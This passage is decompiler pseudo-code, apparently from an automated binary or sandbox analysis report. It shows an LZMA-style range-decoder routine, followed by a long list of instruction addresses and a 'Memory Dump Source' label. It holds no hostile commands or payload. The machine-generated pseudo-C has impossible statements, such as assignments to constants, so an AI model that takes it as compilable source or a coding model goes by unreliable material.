											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                              0x00000000
                                                              0x00407395
                                                              0x00407395
                                                              0x00407399
                                                              0x004073be
                                                              0x004073c8
                                                              0x00000000
                                                              0x0040739b
                                                              0x0040739b
                                                              0x0040739e
                                                              0x004073a2
                                                              0x004073a5
                                                              0x004073a8
                                                              0x004073ac
                                                              0x004073ac
                                                              0x004073af
                                                              0x00407489
                                                              0x00407489
                                                              0x00407490
                                                              0x00407490
                                                              0x00407493
                                                              0x0040749a
                                                              0x004074c7
                                                              0x004074cb
                                                              0x0040752b
                                                              0x0040752e
                                                              0x00407533
                                                              0x00407534
                                                              0x00407536
                                                              0x00407538
                                                              0x0040753b
                                                              0x00407447
                                                              0x00407447
                                                              0x00407447
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406bec
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x00000000
                                                              0x00406bfd
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c06
                                                              0x00406c09
                                                              0x00406c0c
                                                              0x00406c10
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c16
                                                              0x00406c19
                                                              0x00406c1b
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406c21
                                                              0x00406c22
                                                              0x00406c24
                                                              0x00406c27
                                                              0x00406c2c
                                                              0x00406c31
                                                              0x00406c3a
                                                              0x00406c4d
                                                              0x00406c50
                                                              0x00406c5c
                                                              0x00406c84
                                                              0x00406c86
                                                              0x00406c94
                                                              0x00406c94
                                                              0x00406c98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c88
                                                              0x00406c8b
                                                              0x00406c8c
                                                              0x00406c8c
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c62
                                                              0x00406c67
                                                              0x00406c67
                                                              0x00406c70
                                                              0x00406c78
                                                              0x00406c7b
                                                              0x00000000
                                                              0x00406c81
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c9e
                                                              0x00406c9e
                                                              0x00406ca2
                                                              0x0040754e
                                                              0x00000000
                                                              0x0040754e
                                                              0x00406cab
                                                              0x00406cbb
                                                              0x00406cbe
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc4
                                                              0x00406cc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406cca
                                                              0x00406cd0
                                                              0x00406cfa
                                                              0x00406d00
                                                              0x00406d07
                                                              0x00000000
                                                              0x00406d07
                                                              0x00406cd6
                                                              0x00406cd9
                                                              0x00406cde
                                                              0x00406cde
                                                              0x00406ce9
                                                              0x00406cf1
                                                              0x00406cf4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d39
                                                              0x00406d3f
                                                              0x00406d42
                                                              0x00406d4f
                                                              0x00406d57
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d0e
                                                              0x00406d0e
                                                              0x00406d12
                                                              0x0040755d
                                                              0x00000000
                                                              0x0040755d
                                                              0x00406d1e
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d32
                                                              0x00406d37
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040741c
                                                              0x00407420
                                                              0x004075cf
                                                              0x00000000
                                                              0x004075cf
                                                              0x0040742c
                                                              0x00407433
                                                              0x0040743b
                                                              0x0040743e
                                                              0x00407441
                                                              0x00407441
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5f
                                                              0x00406d61
                                                              0x00406d64
                                                              0x00406dd5
                                                              0x00406dd8
                                                              0x00406ddb
                                                              0x00406de2
                                                              0x00406dec
                                                              0x00000000
                                                              0x00406dec
                                                              0x00406d66
                                                              0x00406d6a
                                                              0x00406d6d
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d75
                                                              0x00406d77
                                                              0x00406d7a
                                                              0x00406d7c
                                                              0x00406d81
                                                              0x00406d84
                                                              0x00406d87
                                                              0x00406d8b
                                                              0x00406d92
                                                              0x00406d95
                                                              0x00406d9c
                                                              0x00406da0
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406dac
                                                              0x00406daf
                                                              0x00406dcd
                                                              0x00406dcf
                                                              0x00000000
                                                              0x00406db1
                                                              0x00406db1
                                                              0x00406db4
                                                              0x00406db7
                                                              0x00406dba
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbf
                                                              0x00406dc2
                                                              0x00406dc4
                                                              0x00406dc5
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00406ffe
                                                              0x00407002
                                                              0x00407020
                                                              0x00407023
                                                              0x0040702a
                                                              0x0040702d
                                                              0x00407030
                                                              0x00407033
                                                              0x00407036
                                                              0x00407039
                                                              0x0040703b
                                                              0x00407042
                                                              0x00407043
                                                              0x00407045
                                                              0x00407048
                                                              0x0040704b
                                                              0x0040704e
                                                              0x0040704e
                                                              0x00407053
                                                              0x00000000
                                                              0x00407053
                                                              0x00407004
                                                              0x00407007
                                                              0x0040700a
                                                              0x00407014
                                                              0x00000000
                                                              0x00000000
                                                              0x00407068
                                                              0x0040706c
                                                              0x0040708f
                                                              0x00407092
                                                              0x00407095
                                                              0x0040709f
                                                              0x0040706e
                                                              0x0040706e
                                                              0x00407071
                                                              0x00407074
                                                              0x00407077
                                                              0x00407084
                                                              0x00407087
                                                              0x00407087
                                                              0x00000000
                                                              0x00000000
                                                              0x004070ab
                                                              0x004070af
                                                              0x00000000
                                                              0x00000000
                                                              0x004070b5
                                                              0x004070b9
                                                              0x00000000
                                                              0x00000000
                                                              0x004070bf
                                                              0x004070c1
                                                              0x004070c5
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070cc
                                                              0x00000000
                                                              0x00000000
                                                              0x0040711c
                                                              0x00407120
                                                              0x00407127
                                                              0x0040712a
                                                              0x0040712d
                                                              0x00407137
                                                              0x00000000
                                                              0x00407137
                                                              0x00407122
                                                              0x00000000
                                                              0x00000000
                                                              0x00407143
                                                              0x00407147
                                                              0x0040714e
                                                              0x00407151
                                                              0x00407154
                                                              0x00407149
                                                              0x00407149
                                                              0x00407149
                                                              0x00407157
                                                              0x0040715a
                                                              0x0040715d
                                                              0x0040715d
                                                              0x00407160
                                                              0x00407163
                                                              0x00407166
                                                              0x00407166
                                                              0x00407169
                                                              0x00407170
                                                              0x00407175
                                                              0x00000000
                                                              0x00000000
                                                              0x00407203
                                                              0x00407203
                                                              0x00407207
                                                              0x004075a5
                                                              0x00000000
                                                              0x004075a5
                                                              0x0040720d
                                                              0x00407210
                                                              0x00407213
                                                              0x00407217
                                                              0x0040721a
                                                              0x00407220
                                                              0x00407222
                                                              0x00407222
                                                              0x00407222
                                                              0x00407225
                                                              0x00407228
                                                              0x00000000
                                                              0x00000000
                                                              0x00406df8
                                                              0x00406df8
                                                              0x00406dfc
                                                              0x00407569
                                                              0x00000000
                                                              0x00407569
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0c
                                                              0x00406e0f
                                                              0x00406e15
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e1a
                                                              0x00406e1d
                                                              0x00406e1d
                                                              0x00406e20
                                                              0x00406e23
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e29
                                                              0x00406e2f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e35
                                                              0x00406e35
                                                              0x00406e39
                                                              0x00406e3c
                                                              0x00406e3f
                                                              0x00406e42
                                                              0x00406e45
                                                              0x00406e46
                                                              0x00406e49
                                                              0x00406e4b
                                                              0x00406e51
                                                              0x00406e54
                                                              0x00406e57
                                                              0x00406e5a
                                                              0x00406e5d
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e7f
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8f
                                                              0x00406e93
                                                              0x00406e95
                                                              0x00406e99
                                                              0x00406e65
                                                              0x00406e65
                                                              0x00406e69
                                                              0x00406e71
                                                              0x00406e76
                                                              0x00406e78
                                                              0x00406e7a
                                                              0x00406e7a
                                                              0x00406e9c
                                                              0x00406ea3
                                                              0x00406ea6
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406eb5
                                                              0x00407575
                                                              0x00000000
                                                              0x00407575
                                                              0x00406ebb
                                                              0x00406ebe
                                                              0x00406ec1
                                                              0x00406ec5
                                                              0x00406ec8
                                                              0x00406ece
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed3
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406edc
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ede
                                                              0x00406ee1
                                                              0x00406ee4
                                                              0x00406ee7
                                                              0x00406eea
                                                              0x00406eed
                                                              0x00406ef0
                                                              0x00406ef3
                                                              0x00406ef6
                                                              0x00406ef9
                                                              0x00406efc
                                                              0x00406f14
                                                              0x00406f17
                                                              0x00406f1a
                                                              0x00406f1d
                                                              0x00406f1d
                                                              0x00406f20
                                                              0x00406f24
                                                              0x00406f26
                                                              0x00406efe
                                                              0x00406efe
                                                              0x00406f06
                                                              0x00406f0b
                                                              0x00406f0d
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f29
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00000000
                                                              0x00406f35
                                                              0x00000000
                                                              0x00406f35
                                                              0x00406f33
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f75
                                                              0x00406f75
                                                              0x00406f79
                                                              0x00407581
                                                              0x00000000
                                                              0x00407581
                                                              0x00406f7f
                                                              0x00406f82
                                                              0x00406f85
                                                              0x00406f89
                                                              0x00406f8c
                                                              0x00406f92
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f97
                                                              0x00406f9a
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406f3e
                                                              0x00406f3e
                                                              0x00406f41
                                                              0x00000000
                                                              0x00406f41
                                                              0x00406fa2
                                                              0x00406fa2
                                                              0x00406fa5
                                                              0x00406fa8
                                                              0x00406fab
                                                              0x00406fae
                                                              0x00406fb1
                                                              0x00406fb4
                                                              0x00406fb7
                                                              0x00406fba
                                                              0x00406fbd
                                                              0x00406fc0
                                                              0x00406fd8
                                                              0x00406fdb
                                                              0x00406fde
                                                              0x00406fe1
                                                              0x00406fe1
                                                              0x00406fe4
                                                              0x00406fe8
                                                              0x00406fea
                                                              0x00406fc2
                                                              0x00406fc2
                                                              0x00406fca
                                                              0x00406fcf
                                                              0x00406fd1
                                                              0x00406fd3
                                                              0x00406fd3
                                                              0x00406fed
                                                              0x00406ff4
                                                              0x00406ff7
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00407286
                                                              0x00407286
                                                              0x0040728a
                                                              0x004075b1
                                                              0x00000000
                                                              0x004075b1
                                                              0x00407290
                                                              0x00407293
                                                              0x00407296
                                                              0x0040729a
                                                              0x0040729d
                                                              0x004072a3
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x004073cb
                                                              0x004073cb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00407452
                                                              0x00407456
                                                              0x00407474
                                                              0x00407474
                                                              0x00407474
                                                              0x0040747b
                                                              0x00407482
                                                              0x00000000
                                                              0x00407482
                                                              0x00407458
                                                              0x0040745b
                                                              0x0040745e
                                                              0x00407461
                                                              0x00407468
                                                              0x00000000
                                                              0x00000000
                                                              0x00407543
                                                              0x00407546
                                                              0x00407447
                                                              0x00407447
                                                              0x00000000
                                                              0x00000000
                                                              0x0040717d
                                                              0x0040717f
                                                              0x00407186
                                                              0x00407187
                                                              0x00407189
                                                              0x0040718c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407194
                                                              0x00407197
                                                              0x0040719a
                                                              0x0040719c
                                                              0x0040719e
                                                              0x0040719e
                                                              0x0040719f
                                                              0x004071a2
                                                              0x004071a9
                                                              0x004071ac
                                                              0x004071ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040749f
                                                              0x0040749f
                                                              0x004074a3
                                                              0x004075db
                                                              0x00000000
                                                              0x004075db
                                                              0x004074a9
                                                              0x004074ac
                                                              0x004074af
                                                              0x004074b3
                                                              0x004074b6
                                                              0x004074bc
                                                              0x004074be
                                                              0x004074be
                                                              0x004074be
                                                              0x004074c1
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x004074c4
                                                              0x00000000
                                                              0x00000000
                                                              0x004071c2
                                                              0x004071c5
                                                              0x004071fb
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732b
                                                              0x0040732e
                                                              0x0040732e
                                                              0x00407331
                                                              0x00407333
                                                              0x004075bd
                                                              0x00000000
                                                              0x004075bd
                                                              0x00407339
                                                              0x0040733c
                                                              0x00000000
                                                              0x00000000
                                                              0x00407342
                                                              0x00407346
                                                              0x00407349
                                                              0x00407349
                                                              0x00407349
                                                              0x00000000
                                                              0x00407349
                                                              0x004071c7
                                                              0x004071c9
                                                              0x004071cb
                                                              0x004071cd
                                                              0x004071d0
                                                              0x004071d1
                                                              0x004071d3
                                                              0x004071d5
                                                              0x004071d8
                                                              0x004071db
                                                              0x004071f1
                                                              0x004071f6
                                                              0x0040722e
                                                              0x0040722e
                                                              0x00407232
                                                              0x0040725e
                                                              0x00407260
                                                              0x00407267
                                                              0x0040726a
                                                              0x0040726d
                                                              0x0040726d
                                                              0x00407272
                                                              0x00407272
                                                              0x00407274
                                                              0x00407277
                                                              0x0040727e
                                                              0x00407281
                                                              0x004072ae
                                                              0x004072ae
                                                              0x004072b1
                                                              0x004072b4
                                                              0x00407328
                                                              0x00407328
                                                              0x00407328
                                                              0x00000000
                                                              0x00407328
                                                              0x004072b6
                                                              0x004072bc
                                                              0x004072bf
                                                              0x004072c2
                                                              0x004072c5
                                                              0x004072c8
                                                              0x004072cb
                                                              0x004072ce
                                                              0x004072d1
                                                              0x004072d4
                                                              0x004072d7
                                                              0x004072f0
                                                              0x004072f2
                                                              0x004072f5
                                                              0x004072f6
                                                              0x004072f9
                                                              0x004072fb
                                                              0x004072fe
                                                              0x00407300
                                                              0x00407302
                                                              0x00407305
                                                              0x00407307
                                                              0x0040730a
                                                              0x0040730e
                                                              0x00407310
                                                              0x00407310
                                                              0x00407311
                                                              0x00407314
                                                              0x00407317
                                                              0x004072d9
                                                              0x004072d9
                                                              0x004072e1
                                                              0x004072e6
                                                              0x004072e8
                                                              0x004072eb
                                                              0x004072eb
                                                              0x0040731a
                                                              0x00407321
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x004072ab
                                                              0x00000000
                                                              0x00407323
                                                              0x00000000
                                                              0x00407323
                                                              0x00407321
                                                              0x00407234
                                                              0x00407237
                                                              0x00407239
                                                              0x0040723c
                                                              0x0040723f
                                                              0x00407242
                                                              0x00407244
                                                              0x00407247
                                                              0x0040724a
                                                              0x0040724a
                                                              0x0040724d
                                                              0x0040724d
                                                              0x00407250
                                                              0x00407257
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x0040722b
                                                              0x00000000
                                                              0x00407259
                                                              0x00000000
                                                              0x00407259
                                                              0x00407257
                                                              0x004071dd
                                                              0x004071e0
                                                              0x004071e2
                                                              0x004071e5
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f44
                                                              0x00406f44
                                                              0x00406f48
                                                              0x0040758d
                                                              0x00000000
                                                              0x0040758d
                                                              0x00406f4e
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00406f57
                                                              0x00406f5a
                                                              0x00406f5d
                                                              0x00406f60
                                                              0x00406f62
                                                              0x00406f65
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00406f6d
                                                              0x00000000
                                                              0x00000000
                                                              0x004070cf
                                                              0x004070cf
                                                              0x004070d3
                                                              0x00407599
                                                              0x00000000
                                                              0x00407599
                                                              0x004070d9
                                                              0x004070dc
                                                              0x004070df
                                                              0x004070e2
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e4
                                                              0x004070e7
                                                              0x004070ea
                                                              0x004070ed
                                                              0x004070f0
                                                              0x004070f3
                                                              0x004070f6
                                                              0x004070f7
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070f9
                                                              0x004070fc
                                                              0x004070ff
                                                              0x00407102
                                                              0x00407105
                                                              0x00407105
                                                              0x00407105
                                                              0x00407108
                                                              0x0040710a
                                                              0x0040710a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040734c
                                                              0x0040734c
                                                              0x0040734c
                                                              0x00407350
                                                              0x00000000
                                                              0x00000000
                                                              0x00407356
                                                              0x00407359
                                                              0x0040735c
                                                              0x0040735f
                                                              0x00407361
                                                              0x00407361
                                                              0x00407361
                                                              0x00407364
                                                              0x00407367
                                                              0x0040736a
                                                              0x0040736d
                                                              0x00407370
                                                              0x00407373
                                                              0x00407374
                                                              0x00407376
                                                              0x00407376
                                                              0x00407376
                                                              0x00407379
                                                              0x0040737c
                                                              0x0040737f
                                                              0x00407382
                                                              0x00407385
                                                              0x00407389
                                                              0x0040738b
                                                              0x0040738e
                                                              0x00000000
                                                              0x00407390
                                                              0x0040710d
                                                              0x0040710d
                                                              0x00000000
                                                              0x0040710d
                                                              0x0040738e
                                                              0x004075c3
                                                              0x004075e5
                                                              0x004075eb
                                                              0x004075ed
                                                              0x004075f4
                                                              0x004075f6
                                                              0x004075fd
                                                              0x00407601
                                                              0x00000000
                                                              0x00406bf2
                                                              0x004075fa
                                                              0x004075fa
                                                              0x00000000
                                                              0x004075fa
                                                              0x00407447
                                                              0x004074cd
                                                              0x004074d3
                                                              0x004074d6
                                                              0x004074d9
                                                              0x004074dc
                                                              0x004074df
                                                              0x004074e2
                                                              0x004074e5
                                                              0x004074e8
                                                              0x004074ee
                                                              0x00407507
                                                              0x0040750a
                                                              0x0040750d
                                                              0x00407510
                                                              0x00407514
                                                              0x00407516
                                                              0x00407517
                                                              0x0040751a
                                                              0x004074f0
                                                              0x004074f0
                                                              0x004074f8
                                                              0x004074fd
                                                              0x004074ff
                                                              0x00407502
                                                              0x00407502
                                                              0x00407524
                                                              0x00000000
                                                              0x00407526
                                                              0x00000000
                                                              0x00407526
                                                              0x00407524
                                                              0x00000000
                                                              0x00407399

                                                              Memory Dump Source
